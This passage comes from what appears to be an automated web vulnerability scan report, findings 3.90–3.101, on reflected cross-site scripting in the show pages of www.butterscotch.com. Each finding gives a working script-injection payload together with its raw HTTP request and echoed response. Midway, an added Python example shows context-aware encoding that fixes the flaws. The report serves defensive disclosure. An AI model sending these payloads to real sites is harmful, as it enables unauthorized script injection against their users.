<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/AT9be04'><script>alert(1)</script>43f8c6292e2' />
...[SNIP]...

3.90. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30613"-alert(1)-"94f0bdba78e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/AT30613"-alert(1)-"94f0bdba78e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1771e39f97e82be5a5c155fe5c62274c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1771e39f97e82be5a5c155fe5c62274c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/AT30613"-alert(1)-"94f0bdba78e";

</script>
...[SNIP]...

3.91. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d1"><script>alert(1)</script>966a5ade193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT259d1"><script>alert(1)</script>966a5ade193 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b38aa8055bf37effd925e13cec8e7d9d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b38aa8055bf37effd925e13cec8e7d9d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/AT259d1"><script>alert(1)</script>966a5ade193" />
...[SNIP]...

3.92. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cdff'><script>alert(1)</script>7fc59e7282f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f83e5edc74f32490e6d7c846e45b30e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f83e5edc74f32490e6d7c846e45b30e4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f' />
...[SNIP]...

3.93. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d2"><script>alert(1)</script>0f550289d8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4cbfaeec7ed123668b3a45cda4a1424b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4cbfaeec7ed123668b3a45cda4a1424b=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50560

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e" />
...[SNIP]...

3.94. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f862"-alert(1)-"b0c5dfc94b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=e7f613b15848092e6b01b527ee3f9a12; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7f613b15848092e6b01b527ee3f9a12=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0";

</script>
...[SNIP]...

3.95. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86263'><script>alert(1)</script>484a3c8edc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ccd093b6fe737b0f8d76bc785a9d9d9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ccd093b6fe737b0f8d76bc785a9d9d9f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8' />
...[SNIP]...

3.96. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26605"-alert(1)-"689bed10a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Miss-Download26605"-alert(1)-"689bed10a7d HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=41305656fdf4b89151e629d558c5966a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 41305656fdf4b89151e629d558c5966a=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Miss-Download26605"-alert(1)-"689bed10a7d";

</script>
...[SNIP]...

3.97. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddabd"><script>alert(1)</script>d590b6c1636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9135b2838d5782046085771f61f8a4c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9135b2838d5782046085771f61f8a4c8=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636" />
...[SNIP]...

3.98. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b6d'><script>alert(1)</script>031da9bdfb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ae2fcd6fdc468bd08f7f3e164698ee04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ae2fcd6fdc468bd08f7f3e164698ee04=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50437

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8' />
...[SNIP]...

3.99. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49459"><script>alert(1)</script>6537b84f503 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0bd061f798757be20d5c10cb889c32c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0bd061f798757be20d5c10cb889c32c0=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503" />
...[SNIP]...

3.100. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfea8"-alert(1)-"554ac61bd4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be emitted as a properly escaped JavaScript string literal: quotes, backslashes, line terminators and the characters <, >, & and / encoded as \uXXXX or \/ escapes, so that neither the string literal nor the enclosing script element can be closed by the data. HTML entity encoding alone does not help inside a script block. Note that the same path value is also reflected into two HTML attributes on this page (3.98 and 3.99), which need attribute encoding of both quote characters.

Request

GET /shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ec4e58dabe0a58f5b01a43ede0e3cd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4ec4e58dabe0a58f5b01a43ede0e3cd4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e";

</script>
...[SNIP]...
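
Findings 3.98 to 3.100 show the same request path landing in three different contexts: a single-quoted attribute, a double-quoted attribute and a double-quoted JavaScript string literal, each requiring its own encoding. The following Python is an added example, not code from the report or from butterscotch.com (whose PHP templates are not shown). The render_raw function is a hypothetical reconstruction of those templates from the response fragments above, render_safe applies context-aware encoding to the same slots, and is_safe parses the result back to confirm the scanner's own payloads no longer break out.

```python
"""Added example (not butterscotch.com's code): the three reflection points
the report shows for /shows/<name> (a single-quoted attribute, a double-quoted
attribute and a double-quoted JavaScript string) rendered the way the site
does it (raw) and the way it should be done (context-aware encoding), with a
check of whether the scanner's own payloads still break out."""
import html
import json
import re
from html.parser import HTMLParser

SITE = "http://www.butterscotch.com"

# Payloads copied from findings 3.98, 3.99 and 3.100; the hex runs are the
# scanner's random markers.
PAYLOAD_SQ_ATTR = "b7b6d'><script>alert(1)</script>031da9bdfb8"
PAYLOAD_DQ_ATTR = '49459"><script>alert(1)</script>6537b84f503'
PAYLOAD_JS_STR = 'bfea8"-alert(1)-"554ac61bd4e'


def render_raw(path):
    """Hypothetical reconstruction of the vulnerable templates: the request
    path is concatenated into each context without any encoding."""
    return (f"<input type='hidden' name='ref' value='{path}' />\n"
            f'<input type=hidden name=ref value="{SITE}{path}" />\n'
            f'<script>url = "{SITE}{path}";</script>')


def attr_encode(value):
    """HTML attribute encoding; quote=True escapes both ' and " so the
    result is safe inside either kind of quoted attribute."""
    return html.escape(value, quote=True)


def js_string_literal(value):
    """A double-quoted JavaScript string literal. json.dumps escapes quotes,
    backslashes and control characters; the extra replacements make sure the
    literal can never close the enclosing <script> element, open an HTML
    comment, or carry a raw quote of either kind."""
    lit = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("'", "\\u0027"), ("/", "\\/")):
        lit = lit.replace(ch, esc)
    return lit


def render_safe(path):
    """Same templates, each slot encoded for the context it sits in."""
    a = attr_encode(path)
    return (f"<input type='hidden' name='ref' value='{a}' />\n"
            f'<input type=hidden name=ref value="{SITE}{a}" />\n'
            f"<script>url = {js_string_literal(SITE + path)};</script>")


class _Collector(HTMLParser):
    """Records start tags and the value attribute of every <input>."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))


def is_safe(rendered, path):
    """True when the page parses back to exactly what was intended: one
    <script> element (the template's own), both attributes round-tripping
    to the original path, and the url literal a plain string with no '<'."""
    p = _Collector()
    p.feed(rendered)
    p.close()
    m = re.search(r'url = (.*);</script>', rendered)
    lit = m.group(1) if m else ""
    try:
        url = json.loads(lit)        # the safe literal is also valid JSON
    except ValueError:
        url = None                   # a breakout leaves trailing garbage
    return (p.tags.count("script") == 1
            and p.values == [path, SITE + path]
            and url == SITE + path and "<" not in lit)


if __name__ == "__main__":
    for payload in (PAYLOAD_SQ_ATTR, PAYLOAD_DQ_ATTR, PAYLOAD_JS_STR):
        path = "/shows/Mr-Mobile" + payload
        print(f"{payload[:12]:14} raw safe={is_safe(render_raw(path), path)}"
              f"  encoded safe={is_safe(render_safe(path), path)}")
```

The check deliberately uses a parser rather than string matching: the scanner's single-quote payload is harmless in the double-quoted attribute and vice versa, and the double-quoted JS payload never produces a new script element at all, so only a round trip through an HTML parser and a JSON decoder shows whether every slot is intact at once.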

3.101. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe3'><script>alert(1)</script>2aec528306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=aaedf1562ad27fe7dbffc58ae5c56f87; path=/
